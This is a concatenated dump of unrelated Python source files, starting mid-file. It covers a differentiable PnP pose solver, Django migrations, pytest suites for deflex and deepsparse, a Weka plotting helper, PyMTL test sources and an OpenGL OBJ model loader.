torch.mm(inv_J_fy, J_fx) J_yz = (-1) * torch.mm(inv_J_fy, J_fz) J_yK = (-1) * torch.mm(inv_J_fy, J_fK) grad_x[i] = grad_output[i].reshape(1,m).mm(J_yx).reshape(n,2) grad_z[i] = grad_output[i].reshape(1,m).mm(J_yz).reshape(n,3) grad_K += grad_output[i].reshape(1,m).mm(J_yK).reshape(3,3) return grad_x, grad_z, grad_K, None class BPnPFunction(torch.autograd.Function): r"""Back-propagatable PnP Arguments: pts2d - the 2D keypoints coordinates of size [batch_size, num_keypoints, 2] pts3d - the 3D keypoints coordinates of size [num_keypoints, 3] K - the camera intrinsic matrix of size [3, 3] Returns: P_6d - the 6 DOF poses of size [batch_size, 6], where the first 3 elements of each row are the angle-axis rotation vector (Euler vector) and the last 3 elements are the translation vector. NOTE: This bpnp function assumes that all sets of 2D points in the mini-batch correspond to one common set of 3D points. """ @staticmethod def forward(ctx, pts2d, pts3d, K, ini_pose=None): bs = pts2d.size(0) n = pts2d.size(1) device = pts2d.device pts3d_np = np.array(pts3d.detach().cpu()) K_np = np.array(K.detach().cpu()) P_6d = torch.zeros(bs,6,device=device) try: distCoeffs = pnp.distCoeffs except: distCoeffs = np.zeros((8, 1), dtype='float32') for i in range(bs): pts2d_i_np = np.ascontiguousarray(pts2d[i].detach().cpu()).reshape((n, 1, 2)) if ini_pose is None: _, rvec0, T0 = cv2.solvePnP( objectPoints=pts3d_np, imagePoints=pts2d_i_np, cameraMatrix=K_np, distCoeffs=distCoeffs, flags=cv2.SOLVEPNP_ITERATIVE, useExtrinsicGuess=False ) else: rvec0 = np.array(ini_pose[0, 0:3].cpu().reshape(3, 1)) T0 = np.array(ini_pose[0, 3:6].cpu().reshape(3, 1)) _, rvec, T = cv2.solvePnP( objectPoints=pts3d_np, imagePoints=pts2d_i_np, cameraMatrix=K_np, distCoeffs=None, flags=cv2.SOLVEPNP_ITERATIVE, useExtrinsicGuess=True, rvec=rvec0, tvec=T0 ) angle_axis = torch.Tensor(rvec).reshape(1, 3).float().to(device) T = torch.Tensor(T).reshape(1, 3).float().to(device) P_6d[i, :] = torch.cat((angle_axis, T),dim=-1) ctx.save_for_backward(pts2d,P_6d,pts3d,K) return P_6d @staticmethod def backward(ctx, grad_output): pts2d, P_6d, pts3d, K = ctx.saved_tensors device = pts2d.device bs = pts2d.size(0) n = pts2d.size(1) #nof keypoints m = 6 grad_x = torch.zeros_like(pts2d) grad_z = torch.zeros_like(pts3d) grad_K = torch.zeros_like(K) for i in range(bs): J_fy = torch.zeros(m, m, device=device) J_fx = torch.zeros(m, 2 * n, device=device) J_fz = torch.zeros(m, 3 * n, device=device) J_fK = torch.zeros(m, 9, device=device) torch.set_grad_enabled(True) pts2d_flat = pts2d[i].clone().reshape(-1).detach().requires_grad_() P_6d_flat = P_6d[i].clone().reshape(-1).detach().requires_grad_() pts3d_flat = pts3d.clone().reshape(-1).detach().requires_grad_() K_flat = K.clone().reshape(-1).detach().requires_grad_() for j in range(m): if j > 0: pts2d_flat.grad.zero_() P_6d_flat.grad.zero_() pts3d_flat.grad.zero_() K_flat.grad.zero_() R = kn.angle_axis_to_rotation_matrix(P_6d_flat[0: m-3].reshape(1, 3)) P = torch.cat(( R[0, 0:3, 0:3].reshape(3, 3), P_6d_flat[m-3:m].reshape(3, 1) ), dim=-1) KP = torch.mm(K_flat.reshape(3, 3), P) pts2d_i = pts2d_flat.reshape(n, 2).transpose(0, 1) pts3d_i = torch.cat(( pts3d_flat.reshape(n, 3), torch.ones(n, 1, device=device) ), dim=-1).t() proj_i = KP.mm(pts3d_i) Si = proj_i[2, :].reshape(1, n) r = pts2d_i * Si - proj_i[0:2, :] coefs = _get_coefs( P_6d_flat.reshape(1, 6), pts3d_flat.reshape(n, 3), K_flat.reshape(3, 3) ) coef = coefs[:, :, j].transpose(0, 1) # size: [2,n] fj = (coef * r).sum() fj.backward() J_fy[j, :] = P_6d_flat.grad.clone() J_fx[j, :] = pts2d_flat.grad.clone() J_fz[j, :] = pts3d_flat.grad.clone() J_fK[j, :] = K_flat.grad.clone() inv_J_fy = torch.inverse(J_fy) J_yx = (-1.0) * torch.mm(inv_J_fy, J_fx) J_yz = (-1.0) * torch.mm(inv_J_fy, J_fz) J_yK = (-1.0) * torch.mm(inv_J_fy, J_fK) grad_x[i] = grad_output[i].reshape(1, m).mm(J_yx).reshape(n, 2) grad_z += grad_output[i].reshape(1, m).mm(J_yz).reshape(n, 3) grad_K += grad_output[i].reshape(1, m).mm(J_yK).reshape(3, 3) return grad_x, grad_z, grad_K, None class BPnP(torch.nn.Module): def __init__(self, isBatch: bool=False, # whether 3D keypoints is a mini-batch transpose: bool=True, #whether to transpose the camera matrix useFast: bool=False, #whether to use faster implementation of BPnP ): super(BPnP, self).__init__() self.BPnP_func = BPnPFunction if not isBatch else BPnPFunction_fast \ if useFast else BPnPFunction_m3d self.transpose = transpose def forward(self, keypoints2d: torch.Tensor, # [B, K, 2] intrinsics: torch.Tensor, # [3, 3] keypoints3d: torch.Tensor, # [K, 3] or # [B,K,3] ) -> torch.Tensor: # [B, 6] intrinsics = intrinsics[0,:,:] if len(intrinsics.shape) == 3 else intrinsics intrinsics = intrinsics.t() if self.transpose else intrinsics P_6d = self.BPnP_func.apply(keypoints2d, keypoints3d, intrinsics) return P_6d""" Migrate initial users and roles. https://docs.djangoproject.com/en/3.0/topics/migrations/ This one migration should be run on the 'postgres' database alias. > python manage.py migrate --database=postgres registry 0000 All subsequent migrations should be run on the 'migration' > python manage.py migrate --database=migration """ import sys from django.db import migrations from django.conf import settings import wellregistry.pgsql_utils as pgsql env = settings.ENVIRONMENT class Migration(migrations.Migration): """ SQL to create the database user roles. This creates a new database and schema owner in PG for an application specific name. The "postgres" database and password is Already created during database install. instance (daemon) postgres database 'postgres' admin user name and password loosely like the Oracle 'sys' schema application database app db owner(roles) a postgres role granted logon and DDL with optional schemas, 'public' default read-only user(roles) (typical but not the registry) a postgres role granted logon and SELECT only access client user(roles) (aka agency or provider) connection to postgres for all django client actions a postgres role granted logon and SELECT access and CRUD/DML on limited tables all client logins will be authenticated with login.gov admin user(roles) (aka superuser) connection to postgres for all django admin actions a postgres role granted logon and all CRUD/DML access first authenticated with login.gov then authenticated with django admin login """ initial = False dependencies = [] # We have an option here. we can use the empty dependencies or the following 'postgres' migration dependency. # dependencies = [('postgres', '0001_create_db_users')] # However, when a dependency is used then the executions must be in he django_migrations table. # In order for this metadata to be correct in the application database requires that the migration # for postgres entries to be run in fake mode for the application database. This prevents them from # running twice and causing errors. In an attempt to make them idempotent, the roles are dropped first. # It turns out that if the roles have dependencies then they cannot be dropped. This drop was done # because there is no CREATE ROLE IF NOT EXISTS in postgres. Also, there is no clean way for Django to # check if an object exists like we have for the yaml based liquibase changelogs. # python -m manage migrate --fake postgres if 'test' in sys.argv: operations = [] else: operations = [ # create a application specific schema within the database the connection is made migrations.RunSQL( sql=f"""CREATE SCHEMA IF NOT EXISTS {env['APP_SCHEMA_NAME']} AUTHORIZATION {env['APP_SCHEMA_OWNER_USERNAME']};""", reverse_sql=f"DROP SCHEMA IF EXISTS {env['APP_SCHEMA_NAME']};"), migrations.RunSQL( sql=f"ALTER DATABASE {env['APP_DATABASE_NAME']} SET search_path = {env['APP_SCHEMA_NAME']}, public;", reverse_sql=f"ALTER DATABASE {env['APP_DATABASE_NAME']} RESET search_path;"), # create a login user that will used by the Django admin process to manage entries migrations.RunSQL( sql=pgsql.create_login_role(env['APP_ADMIN_USERNAME'], env['APP_ADMIN_PASSWORD']), reverse_sql=pgsql.drop_role(env['APP_ADMIN_USERNAME'])), # grant CRUD to admin user migrations.RunSQL( sql=pgsql.grant_default(env['APP_SCHEMA_NAME'], 'CRUD', env['APP_ADMIN_USERNAME']), reverse_sql=pgsql.revoke_default(env['APP_SCHEMA_NAME'], 'CRUD', env['APP_ADMIN_USERNAME'])), # create a login user that will used by the app users to manage entries migrations.RunSQL( sql=pgsql.create_login_role(env['APP_CLIENT_USERNAME'], env['APP_CLIENT_PASSWORD']), reverse_sql=pgsql.drop_role(env['APP_CLIENT_USERNAME'])), # grant select to client user migrations.RunSQL( sql=pgsql.grant_default(env['APP_SCHEMA_NAME'], 'SELECT', env['APP_CLIENT_USERNAME']), reverse_sql=pgsql.revoke_default(env['APP_SCHEMA_NAME'], 'SELECT', env['APP_CLIENT_USERNAME'])), # grant CRUD to app user -- after 0001_initial, this cannot be granted until the tables is created ] akshat0109/kisan_backend # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see . # clusterers.py # Copyright (C) 2014-2015 Fracpete (pythonwekawrapper at gmail dot com) import logging import weka.plot as plot if plot.matplotlib_available: import matplotlib.pyplot as plt from weka.core.dataset import Instances from weka.clusterers import ClusterEvaluation # logging setup logger = logging.getLogger(__name__) def plot_cluster_assignments(evl, data, atts=None, inst_no=False, size=10, title=None, outfile=None, wait=True): """ Plots the cluster assignments against the specified attributes. TODO: click events http://matplotlib.org/examples/event_handling/data_browser.html :param evl: the cluster evaluation to obtain the cluster assignments from :type evl: ClusterEvaluation :param data: the dataset the clusterer was evaluated against :type data: Instances :param atts: the list of attribute indices to plot, None for all :type atts: list :param inst_no: whether to include a fake attribute with the instance number :type inst_no: bool :param size: the size of the circles in point :type size: int :param title: an optional title :type title: str :param outfile: the (optional) file to save the generated plot to. The extension determines the file format. :type outfile: str :param wait: whether to wait for the user to close the plot :type wait: bool """ if not plot.matplotlib_available: logger.error("Matplotlib is not installed, plotting unavailable!") return fig = plt.figure() if data.class_index == -1: c = None else: c = [] for i in xrange(data.num_instances): inst = data.get_instance(i) c.append(inst.get_value(inst.class_index)) if atts is None: atts = [] for i in xrange(data.num_attributes): atts.append(i) num_plots = len(atts) if inst_no: num_plots += 1 clusters = evl.cluster_assignments for index, att in enumerate(atts): x = data.values(att) ax = fig.add_subplot( 1, num_plots, index + 1) if c is None: ax.scatter(clusters, x, s=size, alpha=0.5) else: ax.scatter(clusters, x, c=c, s=size, alpha=0.5) ax.set_xlabel("Clusters") ax.set_title(data.attribute(att).name) ax.get_xaxis().set_ticks(list(set(clusters))) ax.grid(True) if inst_no: x = [] for i in xrange(data.num_instances): x.append(i+1) ax = fig.add_subplot( 1, num_plots, num_plots) if c is None: ax.scatter(clusters, x, s=size, alpha=0.5) else: ax.scatter(clusters, x, c=c, s=size, alpha=0.5) ax.set_xlabel("Clusters") ax.set_title("Instance number") ax.get_xaxis().set_ticks(list(set(clusters))) ax.grid(True) if title is None: title = data.relationname fig.canvas.set_window_title(title) plt.draw() if not outfile is None: plt.savefig(outfile) if wait: plt.show() tests/test_render.py100-1000 # tests/test_render.py # <> # # This module is part of Hypatia and is released under the # MIT license: http://opensource.org/licenses/MIT """py.test unit testing for hypatia/render.py Run py.test on this module to assert hypatia.render is completely functional. Example: Use from project root like so: $ py.test tests """ import os import pygame import pytest from hypatia import render try: os.chdir('demo') except OSError: pass # -*- coding: utf-8 -*- """ Processing a list of power plants in Germany. SPDX-FileCopyrightText: 2016-2021 <> SPDX-License-Identifier: MIT """ __copyright__ = " <>" __license__ = "MIT" import os import shutil import pandas as pd import pytest from deflex import scenario from deflex.tools import TEST_PATH from deflex.tools import fetch_example_results def test_basic_scenario_class(): sc = scenario.Scenario() sc.create_nodes() def test_scenario_building(): sc = scenario.DeflexScenario(name="test", year=2014) csv_path = os.path.join( os.path.dirname(__file__), "data", "deflex_2014_de21_test_csv" ) sc.read_csv(csv_path) sc.table2es() sc.check_input_data() sc.input_data["volatile series"].loc[5, ("DE01", "wind")] = float("nan") with pytest.raises( ValueError, match=r"NaN values found in table:'volatile series'" ): sc.check_input_data() def test_node_dict(): nc = scenario.NodeDict() nc["g"] = 5 nc["h"] = 6 msg = ( "Key 'g' already exists. Duplicate keys are not allowed in a " "node dictionary." ) with pytest.raises(KeyError, match=msg): nc["g"] = 7 def test_scenario_es_init(): data = { "general": pd.Series( {"year": 2013, "name": "test", "number of time steps": 8760} ) } sc = scenario.DeflexScenario(input_data=data, debug=True) es1 = sc.initialise_energy_system().es sc = scenario.DeflexScenario(input_data=data) es2 = sc.initialise_energy_system().es sc = scenario.DeflexScenario(input_data=data) sc.input_data["general"]["year"] = 2012 with pytest.warns(UserWarning, match="2012 is a leap year but the"): print(sc.initialise_energy_system().es) sc.input_data["general"]["number of time steps"] = 8784 es3 = sc.initialise_energy_system().es assert len(es1.timeindex) == 3 assert len(es2.timeindex) == 8760 assert len(es3.timeindex) == 8784 def test_scenario_es_init_error(): sc = scenario.DeflexScenario() msg = "There is no input data in the scenario. You cannot initialise an" with pytest.raises(ValueError, match=msg): sc.initialise_energy_system() def test_excel_reader(): sc = scenario.DeflexScenario() xls_fn = fetch_example_results("de02_short.xlsx") sc.read_xlsx(xls_fn) sc.initialise_energy_system() sc.table2es() csv_path = os.path.join(TEST_PATH, "deflex_2013_de02_tmp_X45_test_csv") sc.to_csv(csv_path) xls_fn = os.path.join(TEST_PATH, "deflex_2014_de02_tmp_X45_test") sc.to_xlsx(xls_fn) xls_fn += ".xlsx" sc.to_xlsx(xls_fn) shutil.rmtree(csv_path) os.remove(xls_fn) def test_build_model(): sc = scenario.DeflexScenario(debug=True) xls_fn = fetch_example_results("de02_short.xlsx") sc.read_xlsx(xls_fn) sc.compute() assert sc.es.results["meta"]["name"] == "deflex_2014_de02" def test_build_model_manually(): sc = scenario.DeflexScenario(debug=True) xls_fn = fetch_example_results("de02_short.xlsx") sc.read_xlsx(xls_fn) sc.initialise_energy_system() test_nodes = sc.create_nodes() sc.add_nodes_to_es(test_nodes) dump_fn = os.path.join(TEST_PATH, "pytest_test") sc.dump(dump_fn) model = sc.create_model() sc.solve(model=model, solver="cbc", with_duals=True) assert sc.es.results["meta"]["name"] == "deflex_2014_de02" dump_fn += ".dflx" sc.dump(dump_fn) sc.plot_nodes() scenario.restore_scenario(dump_fn, scenario.DeflexScenario) assert sc.meta["year"] == 2014 os.remove(dump_fn) def test_corrupt_data(): sc = scenario.DeflexScenario(year=2014) csv_path = os.path.join( os.path.dirname(__file__), "data", "deflex_2014_de02_test_csv" ) sc.read_csv(csv_path) sc.input_data["volatile series"].drop( ("DE02", "solar"), inplace=True, axis=1 ) msg = "Missing time series for solar" with pytest.raises(ValueError, match=msg): sc.table2es() def test_restore_an_invalid_scenario(): filename = fetch_example_results("de02.xlsx") msg = "The suffix of a valid deflex scenario has to be '.dflx'." with pytest.raises(IOError, match=msg): scenario.restore_scenario(filename) class TestInputDataCheck: @classmethod def setup_class(cls): cls.sc = scenario.DeflexScenario() fn = os.path.join(TEST_PATH, "de02_short.xlsx") cls.sc.read_xlsx(fn) cls.sc.input_data["general"]["regions"] = float("nan") def test_nan_value_in_general_table_series(self): with pytest.raises(ValueError, match="'general'"): self.sc.check_input_data() def test_nan_values_warnings(self, recwarn): self.sc.input_data["volatile series"].loc[5, ("DE01", "wind")] = float( "nan" ) self.sc.check_input_data(warning=True) assert len(recwarn) == 2 assert "table:'general', column(s): Index(['regions']" in str( recwarn[0].message ) assert ( "table:'volatile series', column(s): (('DE01', 'wind'),)" in str(recwarn[1].message) ) def test_wrong_length(self): msg = "Number of time steps is 97 but the length of the volatile serie" with pytest.raises(ValueError, match=msg): self.sc.initialise_energy_system() xsthunder/aat/abc124/b.py read = input n = int(read()) A = list(map(int, read().split())) cnt = 0 for p in enumerate(A): i, x = p if i == 0: cnt = cnt + 1 elif x >= max(A[0:i]): cnt = cnt + 1 print(cnt) CHHOrganization/BlackDoc import os,sys,time Banner_msg = "Follow Us At Telegram To Stay Upto Date." Line = "*****************************************" Endl2 = " 100% DC. Tool Is Done Loading " DCWMs = " Welcome 2 DarkCity - DC. Tool " #Clearing Screen def clearConsole(): Refresh = 'clear' if os.name in ('nt', 'dos'): #If Machine is running on Windows, it will use cls Refresh = 'cls' os.system(Refresh) def DC_Banner(): #Banner Data print("|//\\\//\\\//\\\//\\\//\\\//\\\//\\\//\\\//\\\//\\\|\n\ |\\\//\\\//\\\//\\\//\\\//\\\//\\\//\\\//\\\//\\\//|\n\ |//\\\//\\\->Cryptic Hats Hackers<-//\\\//\\\|\n\ |\\\//\\\//\\\->DC. Tool V0.0.01<-//\\\//\\\//|\n\ |//\\\//\\\//\\\->SAFWAL 1.0.1<-//\\\//\\\//\\\|\n\ |\\\//\\\//\\\//\\\->Temina 1<-//\\\//\\\//\\\//|\n\ |//\\\//\\\//\\\\//\\\->.Org<-//\\\//\\\//\\\//\\\|\n\ |\\\//\\\//\\\//\\\//\\\-><-//\\\//\\\//\\\//\\\//|\n\ |//\\\//\\\//\\\//\\\//\\\//\\\//\\\//\\\//\\\//\\\|") jakelever/biowordlists import argparse from collections import defaultdict def main(): parser = argparse.ArgumentParser(description='') parser.add_argument('--wordlist',required=True,type=str,help='Wordlist to help resolve conflicts') parser.add_argument('--conflicts',required=True,type=str,help='File with conflicting terms (separated by ;)') parser.add_argument('--nowarn', action='store_true', help='Do not check for missing conflicts where one is expected') parser.add_argument('--outFile',required=True,type=str,help='Output file with resolution options (for deletions file)') args = parser.parse_args() print("Loading wordlist...") main_terms = {} synonym_to_identifier = defaultdict(list) with open(args.wordlist) as f: for line in f: split = line.strip('\n').split('\t') identifier,main,synonyms = split[:3] main_terms[identifier] = main for s in synonyms.lower().split('|'): synonym_to_identifier[s].append(identifier) print("Processing conflicts...") with open(args.conflicts) as f, open(args.outFile,'w') as outF: conflicting_terms = sorted(set([ line.strip().lower() for line in f ])) for ct in conflicting_terms: identifiers = synonym_to_identifier[ct] if not args.nowarn: assert len(identifiers) > 1, "Couldn't find conflict for term: %s" % ct if len(identifiers) > 1: for identifier in identifiers: outData = [ identifier, main_terms[identifier], ct ] outF.write("\t".join(outData) + "\n") print("Done") if __name__ == '__main__': main() import urllib.request import zipfile urllib.request.urlretrieve("http://hdfs.api.wa.bl.uk/webhdfs/v1/9_processing/w3act/w3act-db-csv.zip?user.name=access&op=OPEN", "w3act-db-csv.zip") with zipfile.ZipFile("w3act-db-csv.zip", 'r') as zip_ref: zip_ref.extractall(".") # Generated by Django 2.2.11 on 2020-03-20 04:55 from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='UserWorkPlace', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('is_admin', models.BooleanField(default=False)), ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], options={ 'db_table': 'user_workplace', }, ), migrations.CreateModel( name='Workplace', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(blank=True, max_length=255, null=True, unique=True)), ('created_at', models.DateTimeField(auto_now_add=True, null=True)), ('user', models.ManyToManyField(related_name='user', through='workplace.UserWorkPlace', to=settings.AUTH_USER_MODEL)), ], options={ 'db_table': 'workplace', }, ), migrations.AddField( model_name='userworkplace', name='workplace', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='workplace.Workplace'), ), ] InquestGeronimo/deepsparse # Copyright (c) 2021 - present / Neuralmagic, Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import json import os from typing import Dict, List import ndjson import pytest from helpers import predownload_stub, run_command @pytest.mark.smoke def test_run_inference_help(): cmd = ["deepsparse.transformers.run_inference", "--help"] print(f"\n==== test_run_inference_help command ====\n{' '.join(cmd)}") res = run_command(cmd) if res.stdout is not None: print(f"\n==== test_run_inference_help output ====\n{res.stdout}") assert res.returncode == 0 assert "usage: deepsparse.transformers.run_inference" in res.stdout assert "error" not in res.stdout.lower() assert "fail" not in res.stdout.lower() @pytest.mark.smoke def test_run_inference_ner(cleanup: Dict[str, List]): cmd = [ "deepsparse.transformers.run_inference", "--task", "ner", "--model-path", "zoo:nlp/token_classification/bert-base/pytorch/huggingface/conll2003/" "12layer_pruned80_quant-none-vnni", "--data", "tests/test_data/bert-ner-test-input.json", "--output-file", "output.json", "--scheduler", "multi", ] cleanup["files"].append("output.json") print(f"\n==== test_run_inference_ner command ====\n{' '.join(cmd)}") res = run_command(cmd) if res.stdout is not None: print(f"\n==== test_run_inference_ner output ====\n{res.stdout}") assert res.returncode == 0 assert "error" not in res.stdout.lower() assert "fail" not in res.stdout.lower() # light validation of output file expected = "red" assert os.path.exists("output.json") with open("output.json") as f: data = json.load(f) assert len(data) == 1 assert data["predictions"][0][0]["word"] == expected @pytest.mark.parametrize( ("input_format", "model_path", "local_model"), [ pytest.param( "csv", "zoo:nlp/question_answering/bert-base/pytorch/huggingface/squad/" "pruned_6layers-aggressive_98", True, marks=pytest.mark.smoke, ), ( "json", "zoo:nlp/question_answering/bert-base/pytorch/huggingface/squad/" "pruned_6layers-aggressive_98", False, ), ], ) def test_run_inference_qa( input_format: str, model_path: str, local_model: bool, cleanup: Dict[str, List] ): if local_model: model = predownload_stub(model_path, copy_framework_files=True) model_path = model.dir_path cmd = [ "deepsparse.transformers.run_inference", "--task", "question_answering", "--model-path", model_path, "--data", f"tests/test_data/bert-qa-test-input.{input_format}", "--output-file", "output.json", "--scheduler", "single", ] cleanup["files"].append("output.json") print(f"\n==== test_run_inference_qa command ====\n{' '.join(cmd)}") res = run_command(cmd) if res.stdout is not None: print(f"\n==== test_run_inference_qa output ====\n{res.stdout}") # validate command executed successfully assert res.returncode == 0 assert "error" not in res.stdout.lower() assert "fail" not in res.stdout.lower() # validate output expected_answers = ["Snorlax", "Pikachu", "Bulbasaur"] assert os.path.exists("output.json") with open("output.json") as f: items = ndjson.load(f) for actual, expected_answer in zip(items, expected_answers): assert actual["answer"] == expected_answer @pytest.mark.parametrize( ("input_format", "model_path", "local_model", "additional_opts"), [ ( "csv", "zoo:nlp/text_classification/bert-base/pytorch/huggingface/sst2/base-none", False, ["--batch-size", "1", "--engine-type", "onnxruntime"], ), ( "txt", "zoo:nlp/text_classification/bert-base/pytorch/huggingface/sst2/base-none", True, ["--num-cores", "4", "--engine-type", "onnxruntime"], ), pytest.param( "csv", "zoo:nlp/text_classification/bert-base/pytorch/huggingface/sst2/base-none", True, [], marks=pytest.mark.smoke, ), ( "json", "zoo:nlp/text_classification/bert-base/pytorch/huggingface/sst2/base-none", True, ["--batch-size", "5", "--engine-type", "deepsparse"], ), ( "txt", "zoo:nlp/text_classification/bert-base/pytorch/huggingface/sst2/base-none", True, ["--batch-size", "10", "--num-cores", "4"], ), ], ) def test_run_inference_sst( input_format: str, model_path: str, local_model: bool, additional_opts: List[str], cleanup: Dict[str, List], ): if local_model: model = predownload_stub(model_path, copy_framework_files=True) model_path = model.dir_path cmd = [ "deepsparse.transformers.run_inference", "--task", "text_classification", "--model-path", model_path, "--data", f"tests/test_data/bert-sst-test-input.{input_format}", "--output-file", "output.json", *additional_opts, ] cleanup["files"].append("output.json") print(f"\n==== test_run_inference_sst command ====\n{' '.join(cmd)}") res = run_command(cmd) if res.stdout is not None: print(f"\n==== test_run_inference_sst output ====\n{res.stdout}") assert res.returncode == 0 assert "error" not in res.stdout.lower() assert "fail" not in res.stdout.lower() # light validation of output file # TODO: condition output validation on batch-size due to padding strategy (final # input is repeated to fill in remaining batches) # expected = ["LABEL_1", "LABEL_0"] assert os.path.exists("output.json") # with open("output.json") as f: # for idx, item in enumerate(json_lines.reader(f)): # assert item[0]["label"] == expected[idx] # assert len(data) == 1 # assert data[0]["label"] == expected # coding=utf-8 # author: Lan_zhijiang # description: 图片物品识别(语义分割) """ ======================================================================== Test sources ======================================================================== Test sources with CL or RTL interfaces. Author : Date : Mar 11, 2019 """ from collections import deque from pymtl3 import * from pymtl3.stdlib.ifcs import RecvCL2SendRTL, SendIfcRTL #------------------------------------------------------------------------- # TestSrcCL #------------------------------------------------------------------------- class TestSrcCL( Component ): def construct( s, Type, msgs, initial_delay=0, interval_delay=0 ): s.send = CallerIfcCL( Type=Type ) s.msgs = deque( msgs ) s.count = initial_delay s.delay = interval_delay @update_once def up_src_send(): if s.count > 0: s.count -= 1 elif not s.reset: if s.send.rdy() and s.msgs: s.send( s.msgs.popleft() ) s.count = s.delay # reset count after a message is sent def done( s ): return not s.msgs # Line trace def line_trace( s ): return "{}".format( s.send ) #------------------------------------------------------------------------- # TestSrcRTL #------------------------------------------------------------------------- # TODO: deprecating TestSrcRTL. class TestSrcRTL( Component ): def construct( s, Type, msgs, initial_delay=0, interval_delay=0 ): # Interface s.send = SendIfcRTL( Type ) # Components s.src = TestSrcCL( Type, msgs, initial_delay, interval_delay ) s.adapter = RecvCL2SendRTL( Type ) connect( s.src.send, s.adapter.recv ) connect( s.adapter.send, s.send ) def done( s ): return s.src.done() # Line trace def line_trace( s ): return "{}".format( s.send ) from pydantic import BaseModel, Field from aioftx.http import Request, Response class FutureStats(BaseModel): volume: float next_funding_rate: float next_funding_time: str expiration_price: float predicted_expiration_price: float strike_price: float open_interest: float class GetFutureStatsRequest(Request): path = "/futures/{future_name}/stats" future_name: str = Field(..., path=True) class GetFutureStatsResponse(Response[FutureStats]): pass 0 import OpenGL.GL as GL import OpenGL.GLUT as GLUT import OpenGL.GLU as GLU ## Avoid conflict with Python open from PIL.Image import open as imageOpen ## This class is used to create an object from geometry and materials ## saved to a file in WaveFront object format. The object exported ## from Blender must have the normals included. class ImportedObject: ## Constructor that includes storage for geometry and materials ## for an object. def __init__(self, fileName, setAmbient = 0.9, verbose = False): self.faces = [] self.verts = [] self.norms = [] self.texCoords = [] self.materials = [] self.fileName = fileName self.setAmbient = False self.hasTex = False ## Set this value to False before loading if the model is flat self.isSmooth = True self.verbose = verbose ## Load the material properties from the file def loadMat(self): ## Open the material file with open((self.fileName + ".mtl"), "r") as matFile: ## Load the material properties into tempMat tempMat = [] for line in matFile: ## Break the line into its components vals = line.split() ## Make sure there's something in the line (not blank) if len(vals) > 0 : ## Record that a new material is being applied if vals[0] == "newmtl": n = vals[1] tempMat.append(n) ## Load the specular exponent elif vals[0] == "Ns": n = vals[1] tempMat.append(float(n)) ## Load the diffuse values elif vals[0] == "Kd": n = map(float, vals[1:4]) tempMat.append(n) ## if self.setAmbient is False, ignore ambient values ## and load diffuse values twice to set the ambient ## equal to diffuse if self.setAmbient: tempMat.append(n) ## load the ambient values (if not overridden) elif vals[0] == "Ka" and not self.setAmbient: n = map(float, vals[1:4]) tempMat.append(n) ## load the specular values elif vals[0] == "Ks": n = map(float, vals[1:4]) tempMat.append(n) tempMat.append(None) ## specular is the last line loaded for the material self.materials.append(tempMat) tempMat = [] ## load texture file info elif vals[0] == "map_Kd": ## record the texture file name fileName = vals[1] self.materials[-1][5]=(self.loadTexture(fileName)) self.hasTex = True if self.verbose: print("Loaded " + self.fileName + \ ".mtl with " + str(len(self.materials)) + " materials") ## Load the object geometry. def loadOBJ(self): ## parse the materials file first so we know when to apply materials ## and textures self.loadMat() numFaces = 0 with open((self.fileName + ".obj"), "r") as objFile: for line in objFile: ## Break the line into its components vals = line.split() if len(vals) > 0: ## Load vertices if vals[0] == "v": v = map(float, vals[1:4]) self.verts.append(v) ## Load normals elif vals[0] == "vn": n = map(float, vals[1:4]) self.norms.append(n) ## Load texture coordinates elif vals[0] == "vt": t = map(float, vals[1:3]) self.texCoords.append(t) ## Load materials. Set index to -1! elif vals[0] == "usemtl": m = vals[1] self.faces.append([-1, m, numFaces]) ## Load the faces elif vals[0] == "f": tempFace = [] for f in vals[1:]: ## face entries have vertex/tex coord/normal w = f.split("/") ## Vertex required, but should work if texture or ## normal is missing if w[1] != '' and w[2] != '': tempFace.append([int(w[0])-1, int(w[1])-1, int(w[2])-1]) elif w[1] != '': tempFace.append([int(w[0])-1, int(w[1])-1], -1) elif w[2] != '': tempFace.append([int(w[0])-1, -1, int(w[2])-1]) else : tempFace.append([int(w[0])-1,-1, -1]) self.faces.append(tempFace) if self.verbose: print("Loaded " + self.fileName + ".obj with " + \ str(len(self.verts)) + " vertices, " + \ str(len(self.norms)) + " normals, and " + \ str(len(self.faces)) + " faces") ## Draws the object def drawObject(self): if self.hasTex: GL.glEnable(GL.GL_TEXTURE_2D) ## Use GL.GL_MODULATE instead of GL.GL_DECAL to retain lighting GL.glTexEnvf(GL.GL_TEXTURE_ENV, GL.GL_TEXTURE_ENV_MODE, GL.GL_MODULATE) ## ***************************************************************** ## Change GL.GL_FRONT to GL.GL_FRONT_AND_BACK if faces are missing ## (or fix the normals in the model so they point in the correct ## direction) ## ***************************************************************** GL.glPolygonMode(GL.GL_FRONT, GL.GL_FILL) for face in self.faces: ## Check if a material if face[0] == -1: self.setModelColor(face[1]) else: GL.glBegin(GL.GL_POLYGON) ## drawing normal, then texture, then vertice coords. for f in face: if f[2] != -1: GL.glNormal3f(self.norms[f[2]][0], self.norms[f[2]][1], self.norms[f[2]][2]) if f[1] != -1: GL.glTexCoord2f(self.texCoords[f[1]][0], self.texCoords[f[1]][1]) GL.glVertex3f(self.verts[f[0]][0], self.verts[f[0]][1], self.verts[f[0]][2]) GL.glEnd() ## Turn off texturing (global state variable again) GL.glDisable(GL.GL_TEXTURE_2D) 